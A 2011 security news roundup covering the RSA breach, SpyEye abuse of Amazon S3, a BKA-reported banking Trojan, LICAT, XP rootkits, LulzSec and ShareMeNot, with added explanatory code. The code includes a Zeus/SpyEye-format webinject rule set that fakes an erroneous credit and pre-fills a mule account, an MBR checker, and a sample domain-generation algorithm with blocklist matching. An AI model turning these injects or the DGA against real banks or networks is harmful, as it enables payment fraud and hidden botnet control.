Cyber attack on RSA cost EMC $66 million
In its earnings call Tuesday, EMC disclosed that it spent $66 million in its second quarter to deal with a cyber attack that compromised its RSA Security division.
"We incurred an accrued cost associated with investigating the attack, hardening our systems and working with customers to implement our remediation programs," said EMC's executive vice president David Goulden.
EMC spent the $66 million on transaction monitoring for its corporate customers who worried that their RSA security tokens — long considered the gold-standard for protecting sensitive data — had been compromised in the attack. EMC also offered replacements to any company that requested them.
EMC also revealed some more information about the attack itself, saying that it alerted customers within hours of the intrusion and suspects that the company was targeted for information on its defense and government agencies, not for financial information.
Continued : http://www.washingtonpost.com/blogs/post-tech/post/cyber-attack-on-rsa-cost-emc-66-million/2011/07/26/gIQA1ceKbI_blog.html
Related: What did the RSA breach end up costing EMC?
Amazon S3 exploiting through SpyEye
From Kaspersky Lab Weblog:
Cloud computing providers offer gigabytes of storage for free, and cybercriminals use it to maintain and spread malware of all kinds. At the same time, many legitimate services are not free but are still very attractive to cybercrime gangs. In the case of Amazon, Amazon Simple Storage Service (Amazon S3) does the trick.
Despite being a paid service, the cost is not an obstacle for profitable attackers. In fact, my colleague Dmitry Bestuzhev recently told us about the spread of malware exploiting this service in "the cloud".
The truth is that these cases are not isolated. According to our research, cybercriminals have been running SpyEye activities from Amazon for the past couple of weeks. [Screenshot]
One hurdle for these cybercriminals in abusing Amazon S3 is the creation of an Amazon Web Services (AWS) account. These accounts require a legitimate identity and a method of payment, so it is evident that criminals are using stolen data to overcome this challenge.
Data shows that Amazon cloud services were abused heavily this month to spread malware. The following graph shows the domains used for this campaign from the second half of July 2011: [Graph]
Continued : http://www.securelist.com/en/blog/208193064/Amazon_S3_exploiting_through_SpyEye
Trojan Tricks Victims Into Transferring Funds
It's horrifying enough when a computer crook breaks into your PC, steals your passwords and empties your bank account. Now, a new malware variant uses a devilish scheme to trick people into voluntarily transferring money from their accounts to a cyber thief's account.
The German Federal Criminal Police (the "Bundeskriminalamt" or BKA for short) recently warned consumers about a new Windows malware strain that waits until the victim logs in to his bank account. The malware then presents the customer with a message stating that a credit has been made to his account by mistake, and that the account has been frozen until the errant payment is transferred back.
When the unwitting user views his account balance, the malware modifies the amounts displayed in his browser; it appears that he has recently received a large transfer into his account. The victim is told to immediately make a transfer to return the funds and unlock his account. The malicious software presents an already filled-in online transfer form - with the account and routing numbers for a bank account the attacker controls.
The BKA's advisory isn't specific about the responsible strain of malware, but it is becoming increasingly common for banking Trojans to incorporate "Web injects," custom designed plug-ins that manipulate what victims see in their Web browsers.
Continued : http://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/#more-10881
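How a web inject of the kind described above rewrites what the victim sees, as an added example (this is not code from the Krebs post or the BKA advisory, which names no strain). The rule file uses the widely documented Zeus/SpyEye webinject layout (set_url, data_before, data_inject, data_after, each block closed by data_end); the bank pages, URLs, amounts and the mule account number are constructed for the demonstration.

```python
import fnmatch

# Constructed inject rules. Semantics of the format: on a page whose URL matches
# the set_url pattern, whatever the real page has between the data_before and
# data_after anchors is replaced by the data_inject block.
INJECT_RULES = """\
set_url https://bank.example/accounts/overview* GP
data_before
<span id="balance">
data_end
data_inject
EUR 9,840.00
data_end
data_after
</span>
data_end

set_url https://bank.example/accounts/overview* GP
data_before
<div id="notices">
data_end
data_inject
<p class="alert">A payment of EUR 7,500.00 was credited to your account in error. The account is frozen until the amount is returned.</p>
data_end
data_after
</div>
data_end

set_url https://bank.example/transfer* GP
data_before
name="iban" value="
data_end
data_inject
DE00 0000 0000 0000 0000 00
data_end
data_after
"
data_end

set_url https://bank.example/transfer* GP
data_before
name="amount" value="
data_end
data_inject
7500.00
data_end
data_after
"
data_end
"""

# Constructed pages as the bank's server actually sends them.
OVERVIEW_HTML = """<h1>Account overview</h1>
<div id="notices"></div>
<p>Balance: <span id="balance">EUR 2,340.00</span></p>"""

TRANSFER_HTML = """<form action="/transfer" method="post">
<input name="iban" value="">
<input name="amount" value="">
</form>"""


def parse_rules(text):
    """Turn the rule file into a list of {url, flags, before, inject, after} dicts."""
    rules, current, block, buf = [], None, None, []
    for line in text.splitlines():
        if line.startswith("set_url "):
            _, url, *flags = line.split()
            current = {"url": url, "flags": flags[0] if flags else "",
                       "before": "", "inject": "", "after": ""}
            rules.append(current)
        elif line.startswith("data_end"):
            current[block] = "\n".join(buf)
            block, buf = None, []
        elif line.startswith("data_before"):
            block, buf = "before", []
        elif line.startswith("data_inject"):
            block, buf = "inject", []
        elif line.startswith("data_after"):
            block, buf = "after", []
        elif block is not None:
            buf.append(line)
    return rules


def apply_injects(url, html, rules):
    """What the browser ends up rendering after the Trojan hooks the response."""
    out = html
    for rule in rules:
        if not fnmatch.fnmatchcase(url, rule["url"]):
            continue
        start = out.find(rule["before"])
        if start < 0:
            continue
        start += len(rule["before"])
        end = out.find(rule["after"], start)
        if end < 0:
            continue
        out = out[:start] + rule["inject"] + out[end:]
    return out


def victim_view():
    """Both pages as the victim sees them, versus what the server sent."""
    rules = parse_rules(INJECT_RULES)
    return {
        "overview": apply_injects("https://bank.example/accounts/overview?id=1", OVERVIEW_HTML, rules),
        "transfer": apply_injects("https://bank.example/transfer", TRANSFER_HTML, rules),
    }
```

The point of the demo is that nothing on the wire to the bank changes: the server sent a balance of EUR 2,340.00 and an empty transfer form, and it will later receive a transfer the customer really typed and confirmed. Server-side anomaly checks cannot tell this from a legitimate payment, which is why the useful countermeasure is a confirmation channel the browser does not control, such as an SMS or app message that repeats the beneficiary account and the amount before the transfer is released.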
Security shortcomings in both ICQ instant messenger for Windows and the ICQ website create a possible mechanism for account hijacking, a security researcher warns.
The technique might be used to steal session cookies, enabling the hijacker to impersonate victims, or (with greater difficulty) to gain access to local files on a compromised PC. Kayan found a similar cross-site scripting flaw involving Skype earlier this month.
Heise Security was able to reproduce the flaw discovered by Kayan using the current 7.5 version of ICQ. ICQ told the security news site that it was in the process of developing and testing a security fix.
Automated stock trading poses fraud risk, researcher says
An emphasis on speed and a lack of security makes automated trading in financial markets ripe for exploitation and fraud, a security researcher warned today.
Most stock trades in the U.S. and many around the world in general are now made by data-crunching computers that buy and sell stocks in microseconds--something that used to take human traders minutes to do. With these algorithm-based, high-frequency trades a fraction of a second can be worth millions of dollars for an investor. (See CBS 60 Minutes report on this.)
In the push for greater speed and thus higher profits, security is sacrificed, James Arlen, principal at Push the Stack Consulting, told CNET in a preview of a presentation he will give at the Black Hat security conference in Las Vegas next week titled "Security When Nano Seconds Count."
Continued : http://news.cnet.com/8301-27080_3-20084531-245/automated-stock-trading-poses-fraud-risk-researcher-says/
Stolen USB stick contained police investigation details
Greater Manchester Police have warned that sensitive information about an ongoing criminal investigation was contained on a USB memory stick stolen from an officer's home in Oldham, UK.
The officer has been suspended, pending an investigation, and the matter has been referred to the Independent Police Complaints Commission and the Information Commissioner.
One big question which has to be answered is - was the personal data contained on the USB stick encrypted?
According to the BBC News report, it may not have been password-protected, suggesting that encryption was not being used.
Aside from the issue of whether such sensitive data about an investigation should be left at an officer's home in the first place, why isn't encryption being used as a matter of course to ensure that - even if the information does fall into the wrong hands - it can't be deciphered?
Continued : http://nakedsecurity.sophos.com/2011/07/28/stolen-usb-stick-contained-police-investigation-details/
Also: Greater Manchester Police Sensitive Information Stolen on USB Stick
Windows XP's popularity is rootkit risk, new analysis finds
"OS more vulnerable than Vista and Windows 7"
The stubborn popularity of Windows XP is offering an easy target for the creators of rootkit malware, according to antivirus company Avast. Three quarters of all rootkits it found in a new study were on XP machines.
Forty-nine percent of Avast's considerable user base still runs Windows XP, itself an interesting statistic nearly two years after Windows 7 was launched, but it is its obvious vulnerability in the face of advanced rootkits such as TDL-3/4 (aka 'Alureon') that offers the clearest reminder of its obsolescence.
In the company's six-month study of 630,000 infections, not only were a disproportionate 74 percent of all rootkits found on XP PCs, but 74 percent of these infections were connected to TDL. Overwhelmingly, this malware sits on the master boot record of a PC, which makes it hard to spot and get rid of using conventional tools once it has bypassed security.
Continued : http://news.techworld.com/security/3294191/windows-xps-popularity-is-rootkit-risk-new-analysis-finds/
Also: XP remains fertile breeding ground for cyber infection
Also: XP Remains Main Target of Rootkits
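One concrete way to look for the kind of MBR tampering the Avast study describes, as an added example that is not part of the Techworld article or Avast's tooling: parse the 512-byte sector into its boot code, disk signature and partition table, and compare the boot code against a known-good hash. The two sample MBRs below are constructed (the "boot code" is a few placeholder bytes, not a real loader or real TDL code), with the partition table left identical so the check shows why a partition-table-only comparison misses a boot-code infection.

```python
import hashlib
import struct

SECTOR = 512
BOOT_CODE_LEN = 440        # bytes 0x000-0x1B7: boot loader code
DISK_SIG_OFF = 0x1B8       # 4-byte Windows disk signature, then 2 reserved bytes
PART_TABLE_OFF = 0x1BE     # four 16-byte partition entries
BOOT_SIGNATURE = b"\x55\xAA"


def parse_mbr(sector):
    """Split a 512-byte MBR into boot code hash, disk signature and partitions."""
    if len(sector) != SECTOR:
        raise ValueError("MBR must be exactly 512 bytes")
    if sector[510:512] != BOOT_SIGNATURE:
        raise ValueError("missing 0x55AA boot signature")
    partitions = []
    for i in range(4):
        off = PART_TABLE_OFF + 16 * i
        status, _chs_first, ptype, _chs_last, lba_start, sectors = struct.unpack(
            "<B3sB3sII", sector[off:off + 16])
        if ptype != 0:  # type 0 marks an empty slot
            partitions.append({"bootable": status == 0x80, "type": ptype,
                               "lba_start": lba_start, "sectors": sectors})
    return {
        "boot_code_sha256": hashlib.sha256(sector[:BOOT_CODE_LEN]).hexdigest(),
        "disk_signature": struct.unpack("<I", sector[DISK_SIG_OFF:DISK_SIG_OFF + 4])[0],
        "partitions": partitions,
    }


def check_mbr(sector, baseline_boot_code_sha256, baseline_partitions=None):
    """Return a list of findings; an empty list means the MBR matches the baseline."""
    info = parse_mbr(sector)
    findings = []
    if info["boot_code_sha256"] != baseline_boot_code_sha256:
        findings.append("boot code differs from known-good baseline")
    if baseline_partitions is not None and info["partitions"] != baseline_partitions:
        findings.append("partition table differs from baseline")
    for p in info["partitions"]:
        if p["lba_start"] == 0:
            findings.append("partition entry starts at LBA 0 (overlaps the MBR)")
    return findings


def build_mbr(boot_code, partitions, disk_signature=0x1234ABCD):
    """Assemble a constructed MBR: code, disk signature, partition table, 0x55AA."""
    code = boot_code.ljust(BOOT_CODE_LEN, b"\x00")
    table = b"".join(struct.pack("<B3sB3sII", 0x80 if bootable else 0x00,
                                 b"\xfe\xff\xff", ptype, b"\xfe\xff\xff", lba, n)
                     for bootable, ptype, lba, n in partitions)
    return (code + struct.pack("<I", disk_signature) + b"\x00\x00"
            + table.ljust(64, b"\x00") + BOOT_SIGNATURE)


# Constructed samples: one NTFS partition at LBA 2048; placeholder boot code.
PARTS = [(True, 0x07, 2048, 204800)]
CLEAN_MBR = build_mbr(b"\xfa\x33\xc0\x8e\xd0\xbc\x00\x7c" + b"\x90" * 40, PARTS)
# "Infected": a short jump inserted in front of the original code, table untouched.
INFECTED_MBR = build_mbr(b"\xeb\x1e" + b"\x90" * 30 + b"\xfa\x33\xc0\x8e\xd0\xbc\x00\x7c", PARTS)


def demo():
    baseline = parse_mbr(CLEAN_MBR)
    return {
        "clean": check_mbr(CLEAN_MBR, baseline["boot_code_sha256"], baseline["partitions"]),
        "infected": check_mbr(INFECTED_MBR, baseline["boot_code_sha256"], baseline["partitions"]),
    }
```

On a real machine the sector comes from `open("/dev/sda", "rb").read(512)` on Linux or `\\.\PhysicalDrive0` on Windows, and the baseline hash is taken right after installation. The caveat that matters for TDL-class rootkits: they hook the disk stack and hand a clean copy of sector 0 back to anything reading it from inside the running OS, so the comparison is only trustworthy when the disk is read from clean boot media.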
Google Enables Gmail Two-Factor Security in 150 Countries
Nearly six months after first introducing two-step verification for its Gmail service, Google has expanded the security feature to users outside the English-speaking world, opening it up to people in more than 150 countries.
The company said on Thursday that it has enabled the two-step verification process for users around the world in more than 40 languages. The enhanced Gmail authentication method involves users entering a username and password and then going through a short process to set up a system so that they can receive one-time verification codes via SMS from Google. Users also can use an app for their smartphones that will generate the codes for them.
"Once you enable 2-step verification, you'll see an extra page that prompts you for a code when you sign in to your account. After entering your password, Google will call you with the code, send you an SMS message or give you the choice to generate the code for yourself using a mobile application on your Android, BlackBerry or iPhone device. The choice is up to you. When you enter this code after correctly submitting your password we'll have a pretty good idea that the person signing in is actually you," the company said in its initial announcement of the process back in February.
Continued : http://threatpost.com/en_us/blogs/google-enables-gmail-two-factor-security-150-countries-072811
LiveJournal Targeted in Massive DDoS Attack
LiveJournal has experienced downtime during the past couple of days because of a massive distributed denial-of-service attack that overwhelmed the company's servers.
The outages began on Tuesday, but the company didn't release a statement until yesterday when it confirmed it was the target of an attack.
"We can now publicly disclose that we have been experiencing a large-scale DDoS attack the last two days, which has been the reason for the site issues most users have been experiencing," the company said.
"The traffic load has been immense, at many times our normal load level, and the attack is still on-going. We are in constant contact with our providers to mitigate the attack as best as possible," it added.
LiveJournal is one of the oldest blogging platforms, dating back to 1999, and has over 30 million registered accounts. The service remains hugely popular in Russia which accounts for nearly half of its audience.
Continued : http://news.softpedia.com/news/LiveJournal-Targeted-in-Massive-DDoS-Attack-213909.shtml
Also: LiveJournal groans under 'immense' DDoS attack
LICAT Variant Distributed Via IRS-Related Spam
From TrendLabs Malware Blog:
We have encountered another LICAT variant that is being spread via fake IRS spam to people under specific organizations, including Trend Micro. As you may recall, LICAT is known for its use of dynamic domain generation algorithm (DGA) technique.
In the spammed message, recipients are informed of an issue regarding their tax payment. The message contains a link that supposedly leads to the recipient's tax review. Once the user clicks on the link, they will be prompted to download an executable file, which when executed installs the malware — now detected as TSPY_ZBOT.WHZ — into their system. [Screenshot]
Like any LICAT variant, TSPY_ZBOT.WHZ generates URLs using a computation based on the current date. TSPY_ZBOT.WHZ connects to the dynamically generated URLs in order to download its configuration file, which contains information on the websites it will monitor, as well as the site where it will send any stolen information. This malware also appears to concentrate on the typical ZBOT routines that involve information theft, and uses the DGA technique to evade blocking by antivirus products.
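What "generating URLs from a computation based on the current date" means in practice, and how a defender who has recovered the algorithm turns it around, as an added example: the scheme below is a constructed date-seeded DGA written for this page, not LICAT's actual algorithm (the TrendLabs post does not publish it), and the seed, TLD list and resolver log lines are all made up.

```python
import hashlib
from datetime import date, timedelta

TLDS = ("com", "net", "org", "info", "biz")
SEED = b"constructed-campaign-seed"   # stands in for a per-botnet constant baked into the binary


def generate_domains(day, seed=SEED, count=20):
    """Bot side: derive `count` candidate C&C domains for one calendar day.
    Constructed scheme: MD5(seed || YYYYMMDD || index) -> 12 letters + a TLD."""
    domains = []
    for i in range(count):
        digest = hashlib.md5(seed + day.strftime("%Y%m%d").encode() + bytes([i])).digest()
        label = "".join(chr(ord("a") + b % 26) for b in digest[:12])
        domains.append("%s.%s" % (label, TLDS[digest[12] % len(TLDS)]))
    return domains


def blocklist_for(day, seed=SEED, count=20, slack_days=1):
    """Defender side: pre-compute the day's set plus neighbours for clock skew."""
    names = set()
    for delta in range(-slack_days, slack_days + 1):
        names.update(generate_domains(day + timedelta(days=delta), seed, count))
    return names


def flag_queries(dns_log_lines, blocklist):
    """Match '<timestamp> <client> <qname>' resolver log lines against the set."""
    hits = []
    for line in dns_log_lines:
        parts = line.split()
        if len(parts) < 3:
            continue
        qname = parts[2].rstrip(".").lower()
        if qname in blocklist:
            hits.append((parts[1], qname))
    return hits


SAMPLE_DAY = date(2011, 7, 28)
NEXT_DAY = SAMPLE_DAY + timedelta(days=1)
SAMPLE_LOG = [  # constructed resolver log; the third line is the DGA lookup
    "2011-07-28T09:14:02Z 10.0.0.5 www.example.com.",
    "2011-07-28T09:14:07Z 10.0.0.5 mail.example.net.",
    "2011-07-28T09:14:09Z 10.0.0.5 %s." % generate_domains(SAMPLE_DAY)[3],
    "2011-07-28T09:14:11Z 10.0.0.9 time.example.org.",
]


def demo():
    """Clients that resolved one of today's generated names."""
    return flag_queries(SAMPLE_LOG, blocklist_for(SAMPLE_DAY))
```

The asymmetry is the whole reason DGAs are used: the operator only has to register one of the day's names, while anyone blocking by hostname has to know the algorithm and the seed. Once those are recovered from a sample, the same function that feeds the blocklist also lets a defender register tomorrow's names ahead of the operator and sinkhole the bots.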
Use Google's indexing capabilities to identify vulnerabilities
Next week at Black Hat, Stach & Liu researchers Francis Brown and Rob Ragan will show how the power of Google's indexing capabilities can be harnessed to identify vulnerabilities - particularly SQL injection flaws - that can be used to take over millions of websites that are at risk.
By searching for the right string of information, an attacker can find massive amounts of sensitive data and extract it with a few simple exploits.
Over the past year, Stach & Liu has built what may be the world's single largest repository of live vulnerabilities on the web - in fact, over 3,000 new vulnerable websites are added per day to this database via real-time RSS feed updates from both Google and Bing.
After a year of collecting this research, Brown and Ragan are returning to Black Hat to give the security community the defensive tools they've been asking for to help solve this problem.
Brown and Ragan will also show how Google hacking was used in several other recent, high profile attacks:
Continued : http://www.net-security.org/secworld.php?id=11362
UK Cops 'duped' into arresting wrong LulzSec suspect
The 19-year-old Scotsman fingered Wednesday as a central figure of the LulzSec hacking crew is a fall guy who was framed to take the heat off the real culprit, according to unconfirmed claims from a rival group.
"We believe MET Police got the wrong guy and it happens because of lot of disinformation floating on the web," a Thursday post on the LulzSec Exposed blog said. "LulzSec and Anonymous members are Master trolls and they are good at this."
According to the post, penned by members of a group calling itself the Web Ninjas, the real LulzSec figure known as Topiary is a 23-year-old Swede, who stole the handle from a low-level member after he ran afoul of its parent group Anonymous. The mistaken identity was part of an elaborate ruse to confuse authorities about Topiary's true identity, the speculation claims.
The post comes a day after the Metropolitan Police said a "pre-planned intelligence-led operation" led them to a residential address in the Shetland Islands, off the North Coast of Scotland. That's where they apprehended an unnamed 19-year-old man and transported him to London for questioning. Police said they also questioned a 17-year-old from Lincolnshire and searched his home.
Continued : http://www.theregister.co.uk/2011/07/28/topiary_arrest_rumor/
Also: Topiary: did police arrest the wrong man in LulzSec investigation?
Related: Scotland Yard Arrests Accused LulzSec Spokesman 'Topiary'
From Bruce Schneier @ his "Schneier on Security" Blog:
ShareMeNot is a Firefox add-on for preventing tracking from third-party buttons (like the Facebook "Like" button or the Google "+1" button) until the user actually chooses to interact with them. That is, ShareMeNot doesn't disable/remove these buttons completely. Rather, it allows them to render on the page, but prevents the cookies from being sent until the user actually clicks on them, at which point ShareMeNot releases the cookies and the user gets the desired behavior (i.e., they can Like or +1 the page).